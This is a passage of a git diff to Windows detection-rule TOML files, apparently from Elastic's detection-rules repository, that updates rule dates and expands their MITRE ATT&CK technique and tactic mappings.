-80,17 +80,34 @@ event.category:process and host.os.type:windows and event.type:start and process [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.threshold] field = ["host.id"] value = 10 diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml index 073eef3b42a..39ada5349f6 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -118,31 +118,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml index 83b0ab0edd9..7bf7d72b1ae 100644 --- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml +++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,10 +111,12 @@ sequence by user.id with maxspan=2m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -125,27 +127,43 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.006" name = "HTML Smuggling" reference = "https://attack.mitre.org/techniques/T1027/006/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_execution_from_inetcache.toml b/rules/windows/initial_access_execution_from_inetcache.toml index 1c10e770968..b123d9b673c 100644 --- a/rules/windows/initial_access_execution_from_inetcache.toml +++ b/rules/windows/initial_access_execution_from_inetcache.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,31 +113,49 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_execution_remote_via_msiexec.toml b/rules/windows/initial_access_execution_remote_via_msiexec.toml index 313b2343f65..ed59a607257 100644 --- a/rules/windows/initial_access_execution_remote_via_msiexec.toml +++ b/rules/windows/initial_access_execution_remote_via_msiexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,36 +101,49 @@ MSIEXEC, the Windows Installer, facilitates software installation, modification, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/initial_access_execution_via_office_addins.toml b/rules/windows/initial_access_execution_via_office_addins.toml index ce76d88f67f..00b31a4d91b 100644 --- a/rules/windows/initial_access_execution_via_office_addins.toml +++ b/rules/windows/initial_access_execution_via_office_addins.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,36 +125,59 @@ process where [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.006" name = "Add-ins" reference = "https://attack.mitre.org/techniques/T1137/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml index 61e732cb424..67466b25d61 100644 --- a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml +++ b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,22 +110,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -136,10 +139,88 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml index 018003de5eb..ca1b8afcd21 100644 --- a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml +++ b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,14 +92,59 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml index f7ff84102c4..9e6429272b6 100644 --- a/rules/windows/initial_access_rdp_file_mail_attachment.toml +++ b/rules/windows/initial_access_rdp_file_mail_attachment.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml index 7ec8d133027..7ea7e0e73c9 100644 --- a/rules/windows/initial_access_script_executing_powershell.toml +++ b/rules/windows/initial_access_script_executing_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,27 +105,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -136,10 +139,12 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml index 6846a4ea7e0..b60c69c9869 100644 --- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml +++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/27" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,23 +106,25 @@ sequence by host.id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -132,15 +134,18 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml index 402f26c77f3..153757b6755 100644 --- a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml +++ b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/13" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,10 +84,12 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" @@ -100,14 +102,32 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" @@ -117,3 +137,44 @@ reference = "https://attack.mitre.org/techniques/T1204/002/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml index 519fd905a68..1d9ac75eed3 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -85,26 +85,44 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml index 28e435a3737..d6fed06ce9e 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/08" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,22 +94,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -120,10 +123,25 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml index 74d8fad8028..de4be6c2267 100644 --- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,27 +123,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -154,22 +157,103 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.001" +name = "Compiled HTML File" +reference = "https://attack.mitre.org/techniques/T1218/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.002" +name = "Control Panel" +reference = "https://attack.mitre.org/techniques/T1218/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml index c0828b44e66..964b692c41b 100644 --- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,27 +110,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] 